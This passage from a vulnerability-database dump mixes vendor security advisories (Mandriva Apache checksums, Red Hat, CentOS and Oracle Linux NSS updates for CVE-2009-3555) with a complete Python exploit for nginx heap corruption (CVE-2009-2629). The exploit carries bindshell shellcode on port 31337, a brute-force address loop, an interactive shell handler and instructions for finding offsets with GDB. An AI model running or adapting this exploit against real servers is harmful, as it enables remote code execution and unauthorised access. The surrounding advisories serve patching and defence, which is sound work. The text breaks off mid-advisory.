corporate/4.0/i586/apache-base-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 024922fdd74e02987c974574bee16142 corporate/4.0/i586/apache-devel-2.2.3-1.9.20060mlcs4.i586.rpm\r\n a6f56a8099acac3eed1a5795b319894b \r\ncorporate/4.0/i586/apache-htcacheclean-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 04013648d7252ff8280b8a0bd0bc54d8 \r\ncorporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.9.20060mlcs4.i586.rpm\r\n bbe1270f753acfcadd609f0f5271ab59 corporate/4.0/i586/apache-mod_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 8e39e175d01ba601cc8f4a89aa0aafe8 corporate/4.0/i586/apache-mod_dav-2.2.3-1.9.20060mlcs4.i586.rpm\r\n c624f40ca8a6e17396aa6c8b0e87316a corporate/4.0/i586/apache-mod_dbd-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 48507ca50019f15557211e7208917442 \r\ncorporate/4.0/i586/apache-mod_deflate-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 0c35cb63bff80d6a374dc1bb638c293d \r\ncorporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n e54a0df2e42964146494087a713c88d7 \r\ncorporate/4.0/i586/apache-mod_file_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 6671114f02a3f484499ea8c374e8490a corporate/4.0/i586/apache-mod_ldap-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 9a9c1bea5eec317c217d696d72569e6e \r\ncorporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 23f6363a3bf7833d2b96a3297e4a564f corporate/4.0/i586/apache-mod_proxy-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 3b9415f481e7a22a5198028ae959a5dd \r\ncorporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 86554d7f517fce317019f67fd75259ad corporate/4.0/i586/apache-mod_ssl-2.2.3-1.9.20060mlcs4.i586.rpm\r\n e3e5dc6310d7bf1d4d2044b1725a9d48 corporate/4.0/i586/apache-modules-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 2fd54535f742c7717965f9724d2d01f0 \r\ncorporate/4.0/i586/apache-mod_userdir-2.2.3-1.9.20060mlcs4.i586.rpm\r\n 632c40b46876d9b703ad23eced906f78 \r\ncorporate/4.0/i586/apache-mpm-prefork-2.2.3-1.9.20060mlcs4.i586.rpm\r\n e30e11806815fb176b3c803c5019f177 corporate/4.0/i586/apache-mpm-worker-2.2.3-1.9.20060mlcs4.i586.rpm\r\n b5a512cf0d830276bee061adc68865c6 corporate/4.0/i586/apache-source-2.2.3-1.9.20060mlcs4.i586.rpm \r\n 130effba39f8a908caf0cd50bc21032b corporate/4.0/SRPMS/apache-2.2.3-1.9.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n ecc2a3bd8e40259f3abe8b919be7c19e corporate/4.0/x86_64/apache-base-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 15fbe828c013d9e6f057429316e52b4f corporate/4.0/x86_64/apache-devel-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 35200d719d37cce3340a3340ed8844f0 \r\ncorporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 9557096c0aaa1654b01a702aaec9cfdc \r\ncorporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 360db7ff5aeb5fb4d50965ff46cf33c2 \r\ncorporate/4.0/x86_64/apache-mod_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n fc3466f85615fe8c101c378cf708925e \r\ncorporate/4.0/x86_64/apache-mod_dav-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 36c78f40285a12e4435cdc3f50760e98 \r\ncorporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n af76befa20d16f23e2ca3cdb058a6556 \r\ncorporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 1c150757dbf06246e7410267e56bc874 \r\ncorporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 3a4209a8308aeeddbf85013373e24fe8 \r\ncorporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n bf2d893217e5394b69d6cedb35ba9fcd \r\ncorporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n bab8c9e7147958bda7d19884a1f79828 \r\ncorporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n b8b59cf82195b1525939ae6b2c8d6f74 \r\ncorporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 982465827884b85213e668abc230f614 \r\ncorporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n d9a259ad81f55eabf8a41444f65a5e88 \r\ncorporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 3745511966963a96653d60c083e20557 \r\ncorporate/4.0/x86_64/apache-modules-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n f715e52fc3c12cc00bdce10f7d51b393 \r\ncorporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n e475591ac7db24d778cea1aa9aac4273 \r\ncorporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n 3033b599c0c128f6db7d86563f4ae8a8 \r\ncorporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.9.20060mlcs4.x86_64.rpm\r\n d80783acdafdac78524ce398c49d9109 \r\ncorporate/4.0/x86_64/apache-source-2.2.3-1.9.20060mlcs4.x86_64.rpm \r\n 130effba39f8a908caf0cd50bc21032b corporate/4.0/SRPMS/apache-2.2.3-1.9.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 5cbfefa0f9325fa6f9ef005f07a6b8b8 mes5/i586/apache-base-2.2.9-12.5mdvmes5.i586.rpm\r\n 88d57fd2e10472f88f140ff8d55dbc38 mes5/i586/apache-devel-2.2.9-12.5mdvmes5.i586.rpm\r\n aa0a36e0aced2ca4547b2bc110b6ef4d mes5/i586/apache-htcacheclean-2.2.9-12.5mdvmes5.i586.rpm\r\n ab53720093285644b4ac28acf4da4691 mes5/i586/apache-mod_authn_dbd-2.2.9-12.5mdvmes5.i586.rpm\r\n 3f77dbc75bdd7ee21f29b441c6e521ed mes5/i586/apache-mod_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n a4bf3ff6e987fe3343af8434757a88a7 mes5/i586/apache-mod_dav-2.2.9-12.5mdvmes5.i586.rpm\r\n 05ff14c67e71e4b64afa718ac6ba3546 mes5/i586/apache-mod_dbd-2.2.9-12.5mdvmes5.i586.rpm\r\n da8d3fe9b8273ac43b6bfc1f34863fde mes5/i586/apache-mod_deflate-2.2.9-12.5mdvmes5.i586.rpm\r\n 97244389ee38b5de47643effc489204a mes5/i586/apache-mod_disk_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n d5978571771f84149dffc6190a3e8ea3 mes5/i586/apache-mod_file_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n 463698779bc7b8bbfdb06160ee8338c0 mes5/i586/apache-mod_ldap-2.2.9-12.5mdvmes5.i586.rpm\r\n 75e208ff4c965cb9562d71b0c3f3b54b mes5/i586/apache-mod_mem_cache-2.2.9-12.5mdvmes5.i586.rpm\r\n 258387abdac4af540702af7a3ddc369f mes5/i586/apache-mod_proxy-2.2.9-12.5mdvmes5.i586.rpm\r\n d34347687b1487625db8f33ac1c9bf0a mes5/i586/apache-mod_proxy_ajp-2.2.9-12.5mdvmes5.i586.rpm\r\n 250b156963ece2dc2f9fdac651f6a395 mes5/i586/apache-mod_ssl-2.2.9-12.5mdvmes5.i586.rpm\r\n d21faefa501bb2e5f5858476e02c1226 mes5/i586/apache-modules-2.2.9-12.5mdvmes5.i586.rpm\r\n 0f28dbb179b145765fe5ed88ceb8ec74 mes5/i586/apache-mod_userdir-2.2.9-12.5mdvmes5.i586.rpm\r\n bfa565b70c216c8768a2feb891cc2603 mes5/i586/apache-mpm-event-2.2.9-12.5mdvmes5.i586.rpm\r\n 5a283fab88631fddb90ed198a0e013f7 mes5/i586/apache-mpm-itk-2.2.9-12.5mdvmes5.i586.rpm\r\n d1f025db329f45b590decda1dd39f139 mes5/i586/apache-mpm-peruser-2.2.9-12.5mdvmes5.i586.rpm\r\n 831118fd77a0867e1648bf7b81d3dc21 mes5/i586/apache-mpm-prefork-2.2.9-12.5mdvmes5.i586.rpm\r\n 2e40c5744eca10bcee1994265bfa0add mes5/i586/apache-mpm-worker-2.2.9-12.5mdvmes5.i586.rpm\r\n 384f3506ca34228b8608333366c06567 mes5/i586/apache-source-2.2.9-12.5mdvmes5.i586.rpm \r\n cc6d4768770054f71e7863e59e82d7d2 mes5/SRPMS/apache-2.2.9-12.5mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 042689e5830432c43d311f5852c8a6b9 mes5/x86_64/apache-base-2.2.9-12.5mdvmes5.x86_64.rpm\r\n e8ef5d5e9b50211446abb3bdce89490e mes5/x86_64/apache-devel-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 1feb03240bdd0062a74e144019e65627 mes5/x86_64/apache-htcacheclean-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 53490db1804ebfe8f37e0c5583ff199f mes5/x86_64/apache-mod_authn_dbd-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 57e1c45e2bd8e9c9cd2863a4a75a655f mes5/x86_64/apache-mod_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 896de3fbd0e0e39f97c46f9b97689076 mes5/x86_64/apache-mod_dav-2.2.9-12.5mdvmes5.x86_64.rpm\r\n c3753326915c49a65d6b2dfe591bc417 mes5/x86_64/apache-mod_dbd-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 8213cf826f9b91a97d7ff9211c66580a mes5/x86_64/apache-mod_deflate-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 01ba45d05dc6c0760b39f1292c44a898 mes5/x86_64/apache-mod_disk_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 8d1b82025dce6cd6e58d64fb55f5f924 mes5/x86_64/apache-mod_file_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n d7b2408e8084272e00b42ac6239c8093 mes5/x86_64/apache-mod_ldap-2.2.9-12.5mdvmes5.x86_64.rpm\r\n c062d0ff490d24df2de15d863a13d471 mes5/x86_64/apache-mod_mem_cache-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 38ef66a65a44187ca6a07bb02f96a8c0 mes5/x86_64/apache-mod_proxy-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 408e4b205660e653dfc352ef2ec1fcab mes5/x86_64/apache-mod_proxy_ajp-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 65f377cb8cf3d4179f94ff11b274f857 mes5/x86_64/apache-mod_ssl-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 97bd5c4da3618a8732ae533fa7486f5e mes5/x86_64/apache-modules-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 5ddfd8c440d9e9276eb3ce6fb1e06bcb mes5/x86_64/apache-mod_userdir-2.2.9-12.5mdvmes5.x86_64.rpm\r\n e91ef205af8b8aaca58b941f11a38d04 mes5/x86_64/apache-mpm-event-2.2.9-12.5mdvmes5.x86_64.rpm\r\n d565fc890d268b77fe4de543bf00be40 mes5/x86_64/apache-mpm-itk-2.2.9-12.5mdvmes5.x86_64.rpm\r\n ba4ff5181db66fd6759a4a0d43e2e4dd mes5/x86_64/apache-mpm-peruser-2.2.9-12.5mdvmes5.x86_64.rpm\r\n a9b109a311a1750adafefe3fa20ed68e mes5/x86_64/apache-mpm-prefork-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 2860b00556bc4c55a240ceb4f69043fb mes5/x86_64/apache-mpm-worker-2.2.9-12.5mdvmes5.x86_64.rpm\r\n 65fc889e99eb01a8c7abb77258ef078f mes5/x86_64/apache-source-2.2.9-12.5mdvmes5.x86_64.rpm \r\n cc6d4768770054f71e7863e59e82d7d2 mes5/SRPMS/apache-2.2.9-12.5mdvmes5.src.rpm\r\n\r\n Multi Network Firewall 2.0:\r\n 445117a109396af9413dca2a69f01a0a mnf/2.0/i586/apache2-2.0.48-6.24.C30mdk.i586.rpm\r\n 30176ca39c3d65c2e50cf4c4d192dfa2 mnf/2.0/i586/apache2-common-2.0.48-6.24.C30mdk.i586.rpm\r\n 96b47f57ba9fb077da6cf27bc21e7a76 mnf/2.0/i586/apache2-devel-2.0.48-6.24.C30mdk.i586.rpm\r\n ee2e1c41ed579312e9f6365af1f475b3 mnf/2.0/i586/apache2-manual-2.0.48-6.24.C30mdk.i586.rpm\r\n 06ce15a998c23ec835a81a061455249a mnf/2.0/i586/apache2-mod_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 7abe5081d5d991b09a8484f41aeadba5 mnf/2.0/i586/apache2-mod_dav-2.0.48-6.24.C30mdk.i586.rpm\r\n 73516b134aed9853067ab93fe830513b mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.24.C30mdk.i586.rpm\r\n 0d98687a38a7a9806030d8514fe9e0bc mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 8be5990f31ccf58eb110efb0c45487b7 mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 4ddd2e15e616715ea577e1b1b010da39 mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.24.C30mdk.i586.rpm\r\n bccdb965684cd1e24d054f7febc096ff mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 345e5038a9390a07a62d39da825df65d mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.24.C30mdk.i586.rpm\r\n a3e4dc57677b0728ae7c87a4a0cd4e68 mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.24.C30mdk.i586.rpm\r\n c5c5fde933d0a30744a18e8fbdc677f5 mnf/2.0/i586/apache2-modules-2.0.48-6.24.C30mdk.i586.rpm\r\n da00919dd82d8db9b7fb4a63c6b44965 mnf/2.0/i586/apache2-source-2.0.48-6.24.C30mdk.i586.rpm\r\n 036643a921387b88380a3f913865ec5f mnf/2.0/i586/libapr0-2.0.48-6.24.C30mdk.i586.rpm \r\n 63e2249a390c150ab253ad9b22c3be11 mnf/2.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFK9wgKmqjQ0CJFipgRAuxlAJ9Nb9gIPz9aFR19dx/k7386s7uQCQCg8k3E\r\nHCb1+1oDp434m6raw3FK1hw=\r\n=9V9Z\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-09T00:00:00", "published": "2009-11-09T00:00:00", "id": "SECURITYVULNS:DOC:22763", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22763", "title": "[ MDVSA-2009:295 ] apache", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:21", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2629"], "description": "**Name**| nginx \n---|--- \n**CVE**| CVE-2009-2629 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Jinx \n**Notes**| CVE Name: CVE-2009-2629 \nVENDOR: nginx \nNotes: \n \nUse -O exec_shield:0 against Ubuntu targets - the default is to assume you want execshield \navoidance. \n \n \nRepeatability: Infinite \nReferences: ['http://www.kb.cert.org/vuls/id/180065'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2629 \nDate public: 10/29/2009 \nCVSS: 7.5 \n\n", "edition": 2, "modified": "2009-09-15T22:30:00", "published": "2009-09-15T22:30:00", "id": "NGINX", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/nginx", "type": "canvas", "title": "Immunity Canvas: NGINX", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T20:39:32", "description": "nginx v0.6.38 Heap Corruption Exploit. CVE-2009-2629. Local exploit for linux platform", "published": "2010-08-29T00:00:00", "type": "exploitdb", "title": "nginx 0.6.38 - Heap Corruption Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2629"], "modified": "2010-08-29T00:00:00", "id": "EDB-ID:14830", "href": "https://www.exploit-db.com/exploits/14830/", "sourceData": "#!/usr/bin/env python\r\n#\r\n# Exploit Title: nginx heap corruption\r\n# Date: 08/26/2010\r\n# Author: aaron conole <apconole@yahoo.com>\r\n# Software Link: http://nginx.org/download/nginx-0.6.38.tar.gz\r\n# Version: <= 0.6.38, <= 0.7.61\r\n# Tested on: BT4R1 running nginx 0.6.38 locally\r\n# CVE: 2009-2629\r\n#\r\n# note: this was written and tested against BT4. This means it's an\r\n# intel x86 setup (ie: offsets for 32-bit machine, etc.). YMMV\r\n# also - only tested successfully against nginx 0.6.38\r\n# you'll definitely need to modify against other versions\r\n#\r\n# you'll need to know where the offset is going to land, and what the pad is\r\n# from that point to when you've tained execution flow.\r\n#\r\n# A quick way to find out just for verification would be to launch nginx,\r\n# attach GDB to the worker and target it with the exploit, setting the offset\r\n# to 0, or some other arbitrary value. It should crash on a piece of code which\r\n# resembles:\r\n# if (ctx->offset)\r\n#\r\n# At that point, merely dump the *r; capture the value for the data pointer\r\n# (it'll be the one with \"GET //../Aa0\") and add 131 to it (decimal 131 to the\r\n# hex pointer value). That should give you a good area to test with. You might\r\n# want to use the range at that point and set the last octet to 00.\r\n#\r\n# NOTE: you'll need a configuration with merge_slashes enabled. I haven't yet\r\n# found a \"magic\" combination that would cause the state machine to do\r\n# what I want to make the bug trigger. Once I do, you can bet BUG will be\r\n# replaced.\r\n\r\n#Basically, on BT4:\r\n#- compile\r\n#- edit the configuration to enable merge slashes (just insert a line above the sendpage / sendfile config option \"merge_slashes off;\")\r\n#- Launch nginx, and attach GDB to the worker\r\n#- Send the exploit at it with offset 0x11111111\r\n#- When the worker gets a sigsegv, it will be on a line which looks like \"if (ctx->offset)\", at that point type \"p *r\"\r\n#- In the r data structure will be a few different fields, one which is a buffer that contains \"GET //../Aa0Aa1Aa2..\". This buffer has an address (lets say 0x8c1d32f).\r\n#- Save off this address, and detach from the worker. A new one will spawn (the \"manager\" process will keep it going).\r\n#- At this point, rerun the exploit, setting the offset to 0x8c1d300 and adding the -b flag\r\n#- In a minute or two, you should be given the shell.\r\n\r\nimport os\r\nimport sys\r\nimport socket\r\nimport select\r\nimport struct\r\nimport time\r\nimport urllib\r\n\r\nREQUEST_METHOD='GET '\r\n\r\n# NOTE - this is a 32-bit null pointer. A 64-bit version would be 8-bytes (but take care to re-verify the structures)\r\nNULLPTR='\\x00\\x00\\x00\\x00'\r\n\r\n# NOTE - this shellcode was shamelessly stolen from the www\r\n# port 31337 bindshell for /bin/sh\r\nSHELL='\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\\x89\\xc7\\x52\\x66\\x68\\x7a\\x69\\x43\\x66\\x53\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x51\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80'\r\n\r\n# Why did I write this up this way? Because given enough time, I think I can\r\n# find a proper set of state change which can give me the same effect (ie: ../\r\n# appearing as the 3rd, 4th, and 5th characters) at a later date.\r\n# That's all controlled by the complex uri parsing bit, though.\r\nDOUBLE_SLASH='//../'\r\n\r\nBUG=DOUBLE_SLASH\r\n\r\n# taken from the metasploit pattern_create.rb\r\nPATTERN='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4'\r\n\r\ndef connect_socket(host,port):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect( (host, port) )\r\n except:\r\n return 0\r\n #sock.setblocking(0)\r\n return sock\r\n\r\ndef handle_connection(sock):\r\n while(1):\r\n r, w, e = select.select( [sock, sys.stdin],\r\n [],\r\n [sock, sys.stdin] )\r\n for s in r:\r\n if s == sys.stdin:\r\n buf = sys.stdin.readline()\r\n \r\n try:\r\n if buf != '':\r\n sock.send(buf)\r\n except:\r\n print \"Xon close?\"\r\n return 0\r\n \r\n elif s == sock:\r\n try:\r\n buf = sock.recv(100)\r\n except:\r\n print \"Xon close?\"\r\n return 0\r\n if buf != '':\r\n sys.stdout.write(buf)\r\n\r\ndef main(argv):\r\n argc = len(argv)\r\n\r\n if argc < 4:\r\n print \"usage: %s <host> <port> <ctx_addr> [-b]\" % (argv[0])\r\n print \"[*] exploit for nginx <= 0.6.38 CVE 2009-2629\"\r\n print \"[*] host = the remote host name\"\r\n print \"[*] port = the remote port\"\r\n print \"[*] ctx_addr is where the context address should begin at\"\r\n print \"[*] -b specifies a brute-force (which will start at ctx_addr\"\r\n sys.exit(0)\r\n\r\n host = argv[1]\r\n port = int(argv[2])\r\n ctx_addr = int(argv[3],16)\r\n\r\n brute_flag = 0\r\n if(argc == 5):\r\n brute_flag = 1\r\n\r\n testing = 1\r\n\r\n print \"[*] target: %s:%d\" % (host, port)\r\n\r\n try:\r\n sd = urllib.urlopen(\"http://%s:%d\" % (host, port))\r\n sd.close()\r\n except IOError, errmsg:\r\n print \"[*] error: %s\" % (errmsg)\r\n sys.exit(1)\r\n\r\n print \"[*] sending exploit string to %s:%d\" % (host, port)\r\n\r\n while(testing):\r\n \r\n CTX_ADDRESS = struct.pack('<L',ctx_addr)\r\n CTX_OUT_ADDRESS = struct.pack('<L', ctx_addr-60)\r\n POOL_ADDRESS = struct.pack('<L',ctx_addr+56)\r\n DATA_ADDRESS = struct.pack('<L',ctx_addr+86)\r\n RANGE_ADDRESS = struct.pack('<L',ctx_addr+124)\r\n SHELL_ADDRESS = struct.pack('<L',ctx_addr+128)\r\n\r\n #PADDING\r\n SHELLCODE=PATTERN[:67]\r\n\r\n #the output context structure\r\n SHELLCODE+=NULLPTR*9+POOL_ADDRESS+NULLPTR*4+SHELL_ADDRESS\r\n \r\n #Magic\r\n SHELLCODE+=CTX_OUT_ADDRESS+CTX_ADDRESS+NULLPTR\r\n\r\n #this is the context object - some null ptrs, then we set range, then\r\n #pool address\r\n SHELLCODE+=NULLPTR*3+RANGE_ADDRESS+'\\x01\\x00\\x00\\x00'\r\n SHELLCODE+=NULLPTR*2+POOL_ADDRESS\r\n\r\n #this is the data buffer object\r\n SHELLCODE+=NULLPTR*4+SHELL_ADDRESS+NULLPTR\r\n\r\n #this is the pool memory structure ..\r\n SHELLCODE+=DATA_ADDRESS+NULLPTR+POOL_ADDRESS+NULLPTR*12+NULLPTR\r\n\r\n # this is the range structure\r\n SHELLCODE+='\\xff\\xff\\xff\\xff'+NULLPTR*3\r\n\r\n SHELLCODE+=SHELL\r\n \r\n payload = REQUEST_METHOD\r\n payload += BUG\r\n payload += SHELLCODE\r\n payload += ' HTTP/1.0\\r\\n\\r\\n'\r\n\r\n sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sd.connect((host, port))\r\n sd.send(payload)\r\n sd.close()\r\n\r\n if (brute_flag):\r\n nsock = connect_socket(host,31337)\r\n if nsock != 0:\r\n print \"[*] Successful Exploit via buffer: %x\" % (ctx_addr)\r\n testing = 0\r\n handle_connection(nsock)\r\n else:\r\n ctx_addr = ctx_addr + 1\r\n else:\r\n testing = 0\r\n print \"[*] FIN.\"\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv)\r\n sys.exit(0)\r\n\r\n# EOF\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/14830/"}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:15", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "nspr:\n[4.8.4-1]\n- Update to NSPR 4.8.4\nnss:\n[3.12.6-1.0.1.el5_4]\n- Update clean.gif in the nss-3.12.6-stripped.tar.bz2 tarball\n[3.12.6-1]\n- Update to 3.12.6\n[3.12.5.99-1.2]\n- Fix an unsatified tools runtime dependency\n[3.12.5.99-1.1]\n- Preserve file attributes and include some test cleanup\n[3.12.5.99-1]\n- Update to NSS_3_12_6_RC1\n[3.12.3.99.3-1.el5_3.4]\n- CVE-2009-3555 (bug 543536) ", "edition": 4, "modified": "2010-03-25T00:00:00", "published": "2010-03-25T00:00:00", "id": "ELSA-2010-0165", "href": "http://linux.oracle.com/errata/ELSA-2010-0165.html", "title": "nss security update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:36", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Network Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Applications built with NSS can support SSLv2, SSLv3, TLS,\nand other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for non-GUI\noperating system facilities. These facilities include threads, thread\nsynchronization, normal file and network I/O, interval timing, calendar\ntime, basic memory management (malloc and free), and shared library\nlinking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the following\nKnowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages, which\nupdate NSS to version 3.12.6. This erratum also updates the NSPR packages\nto the version required by NSS 3.12.6. All running applications using the\nNSS library must be restarted for this update to take effect.", "modified": "2017-09-08T12:08:02", "published": "2010-03-25T04:00:00", "id": "RHSA-2010:0165", "href": "https://access.redhat.com/errata/RHSA-2010:0165", "type": "redhat", "title": "(RHSA-2010:0165) Moderate: nss security update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:24:56", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0165\n\n\nNetwork Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Applications built with NSS can support SSLv2, SSLv3, TLS,\nand other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for non-GUI\noperating system facilities. These facilities include threads, thread\nsynchronization, normal file and network I/O, interval timing, calendar\ntime, basic memory management (malloc and free), and shared library\nlinking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details 